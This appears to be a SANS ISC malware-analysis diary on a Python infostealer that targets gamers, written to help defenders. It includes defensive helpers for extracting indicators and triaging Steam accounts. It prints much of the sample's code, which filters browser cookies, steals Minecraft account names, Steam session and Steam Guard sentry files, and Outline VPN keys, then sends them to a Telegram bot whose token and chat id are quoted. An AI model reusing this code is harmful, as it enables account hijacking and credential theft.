Python Infostealer Targeting Gamers, (Wed, Mar 1st)


There are a lot of gamers on the Internet, and they generate a lot of business. Many games can be downloaded for free, but they come with online shops selling extras such as extra lives, weapons, outfits and packages, which makes gaming a very lucrative business today[1].

I spotted a malicious Python script that acts as an infostealer focused on gamers! The code contains Russian-language strings (for example “Произошёл запуск”, literally “a launch occurred”, i.e. the script has just started on a new victim), which points to a Russian-speaking author, although language alone is weak evidence for attribution.

Many malicious Python scripts use Discord webhooks as a C2 channel, but this one uses Telegram. The bot token is only base64-encoded:

bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)

Decoding the blob yields a regular Telegram bot token of the form `<bot id>:<secret>`, a useful indicator for hunting other samples from the same operator and for reporting the bot.
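Because the token is only base64-encoded, pulling it (and the destination chat id) out of a sample is a mechanical triage step. The helper below is an added example written for this diary, not code from the sample: it scans a script for quoted base64 literals, decodes them, and keeps those matching Telegram's public bot-token format (`<numeric id>:<35-character secret>`), then reads the chat ids assigned to `send_to_users`. The SAMPLE string contains the two relevant lines quoted from the sample above; the regexes and function names are this example's own.

```python
import base64
import re

# Telegram bot tokens are "<numeric bot id>:<35-char secret>" (public format).
TELEGRAM_TOKEN_RE = re.compile(r"^(\d{8,10}):([A-Za-z0-9_-]{35})$")

# Quoted literals of 16+ base64 characters with optional padding.
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def decode_b64_literals(source):
    """Return every quoted base64 literal in *source* that decodes to printable UTF-8."""
    decoded = []
    for blob in B64_LITERAL_RE.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: skip it
        if text.isprintable():
            decoded.append(text)
    return decoded


def find_telegram_tokens(source):
    """Return (bot_id, token) pairs for every decoded literal that is a Telegram bot token."""
    hits = []
    for text in decode_b64_literals(source):
        match = TELEGRAM_TOKEN_RE.match(text)
        if match:
            hits.append((match.group(1), text))
    return hits


def find_chat_ids(source):
    """Return the numeric Telegram chat ids assigned to send_to_users (where the loot goes)."""
    match = re.search(r"send_to_users\s*=\s*\[([^\]]*)\]", source)
    if not match:
        return []
    return [int(x) for x in re.findall(r"-?\d+", match.group(1))]


# The two lines of the sample quoted in this diary (token literal and chat id).
SAMPLE = '''
bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)
send_to_users = [1084445274]
'''

if __name__ == "__main__":
    for bot_id, token in find_telegram_tokens(SAMPLE):
        print(f"bot id {bot_id}: {token}")
    print("exfil chat ids:", find_chat_ids(SAMPLE))
```

Run against the sample, the decoded token carries bot id 5959507618 and the loot goes to chat 1084445274. With those two values an analyst can identify the bot (Telegram's Bot API `getMe` method) and report it; this helper itself stays offline.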

The script contains the usual routines to steal cookies and credentials from a Chrome installation, but it also goes after resources specific to gamers.

First, the Chrome data is inspected and the stolen cookies are filtered against a list of interesting domains. Note that gaming platforms sit next to identity providers, payment services and cryptocurrency sites:

target_domain = [
    "minecraft.net", 
    "google.com", 
    "live.com", 
    "apple.com", 
    "twitter.com", 
    "spotify.com", 
    "discord.com", 
    "discord.gg", 
    "blockchain.com", 
    "coinbase.com", 
    "paypal.com", 
    "mojang.com", 
    "steamcommunity.com", 
    "steampowered.com", 
    "origin.com", 
    "ea.com", 
    "ubisoft.com"
]

Then, the script checks whether the Minecraft launcher is installed and, if so, extracts the Microsoft and Minecraft account names from the launcher's account file:

# apps["Minecraft"] holds the path to the Minecraft launcher's data folder
if os.path.isdir(apps["Minecraft"]):
    # account file written by the Microsoft Store version of the launcher
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        # "accounts" is a dict keyed by account id
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass

Steam[2] is the best-known PC game distribution platform. The script collects what is needed to reuse a victim's Steam session: the installation path is read from the registry, then config.vdf, loginusers.vdf and the ssfn* files (the Steam Guard "sentry" files that mark this machine as trusted) are located for exfiltration:

# path_steam (defined elsewhere in the sample) is the Steam key under HKCU.
# Values are read by index, which only works while Steam writes them in a fixed order.
try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]           # installation path
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]  # auto-login account name
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]        # client language
    steam_config = steampath + "/config/config.vdf"         # client configuration, incl. cached login data
    steam_users = steampath + "/config/loginusers.vdf"      # accounts that logged in on this machine
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:                              # Steam Guard sentry files
            steam_ssfn.append(filename)
    steam_installed = True

except FileNotFoundError:
    # winreg.OpenKey raises FileNotFoundError when the key does not exist
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]  # Telegram chat id that receives the loot

for user in send_to_users:
    # first beacon: timestamp, public IP (via STUN), hostname, user, OS ("OC" is the Cyrillic abbreviation) and Steam details
    bot.send_message(user, f"Произошёл запуск `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name:  `{socket.gethostname()}`\n??User:  `{os.getlogin()}`\n?OC:  `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        # config.vdf and loginusers.vdf are uploaded as documents...
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        # ...followed by every Steam Guard sentry file
        for filename in steam_ssfn:
            with open(f"{steampath}/{filename}", "rb") as file:
                bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
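To judge the impact of the Steam exfiltration during incident response, it helps to read the stolen loginusers.vdf the way the attacker will. The parser below is an added example for this diary, not code from the sample or from Valve: it implements Valve's KeyValues (VDF) text format, which loginusers.vdf uses, and lists the accounts flagged RememberPassword=1, i.e. those whose login is cached on the machine and whose session the exfiltrated config.vdf and ssfn* sentry files let an attacker reuse without a Steam Guard prompt. The sample file is constructed for this example with invented Steam IDs and account names; comment handling (`//`) and string unescaping are deliberately left out because loginusers.vdf uses neither.

```python
import re

# Constructed sample in Valve's KeyValues format, modelled on a real loginusers.vdf
# (Steam IDs, account and persona names invented for this example).
SAMPLE_LOGINUSERS = '''
"users"
{
	"76561198000000001"
	{
		"AccountName"		"alice_plays"
		"PersonaName"		"Alice"
		"RememberPassword"		"1"
		"MostRecent"		"1"
		"Timestamp"		"1677600000"
	}
	"76561198000000002"
	{
		"AccountName"		"bob_lan"
		"PersonaName"		"Bob"
		"RememberPassword"		"0"
		"MostRecent"		"0"
		"Timestamp"		"1670000000"
	}
}
'''

# A token is either a quoted string (backslash escapes allowed) or a brace.
_TOKEN_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|([{}])')


def _tokenize(text):
    """Yield (token, is_brace) pairs; whitespace between tokens is ignored."""
    for match in _TOKEN_RE.finditer(text):
        if match.group(2) is not None:
            yield match.group(2), True
        else:
            yield match.group(1), False


def parse_vdf(text):
    """Parse a KeyValues document into nested dicts. All leaf values stay strings."""
    root = {}
    stack = [root]          # dict currently being filled
    pending_key = None      # key waiting for its value or for a '{'
    for token, is_brace in _tokenize(text):
        if is_brace and token == "{":
            if pending_key is None:
                raise ValueError("'{' without a preceding key")
            child = {}
            stack[-1][pending_key] = child
            stack.append(child)
            pending_key = None
        elif is_brace:  # '}'
            if len(stack) == 1:
                raise ValueError("unbalanced '}'")
            stack.pop()
        elif pending_key is None:
            pending_key = token
        else:
            stack[-1][pending_key] = token
            pending_key = None
    if len(stack) != 1 or pending_key is not None:
        raise ValueError("truncated document")
    return root


def hijackable_accounts(loginusers_text):
    """(steam_id, account_name) for every account with a cached login on this machine.

    RememberPassword=1 is what makes the stolen config.vdf + ssfn* files valuable:
    those are the sessions an attacker can try to reuse."""
    users = parse_vdf(loginusers_text).get("users", {})
    return sorted(
        (steam_id, fields.get("AccountName", ""))
        for steam_id, fields in users.items()
        if fields.get("RememberPassword") == "1"
    )


if __name__ == "__main__":
    for steam_id, name in hijackable_accounts(SAMPLE_LOGINUSERS):
        print(f"exposed Steam account {name} ({steam_id}): revoke sessions and reset password")
```

On the constructed file only alice_plays is exposed; bob_lan logged in without "remember me", so the sentry files alone do not give the attacker his session. In a real case, the accounts this function returns are the ones to deauthorize ("Deauthorize all other devices" in Steam Guard settings) and re-credential first.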

The script also looks for Outline Manager (the management application for Jigsaw's Outline VPN) and pulls access keys out of its local storage:

# apps["Outline"] holds the path to Outline Manager's local storage folder
if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"   # LevelDB log file of the Electron local storage
    # binary LevelDB content is read in text mode; only the last line mentioning "accessKey" is kept
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
    # strip every character that cannot be part of an access key URL
    # (if no line matched, "key" is undefined here and the sample crashes with NameError)
    reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
    key = reg.sub('', key)

    for user in send_to_users:
        bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")

There is nothing brand new in this sample except its focus on gamers. A lot of money flows through games (sometimes a lot), so gaming accounts are attractive targets for attackers. Stay safe!

[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
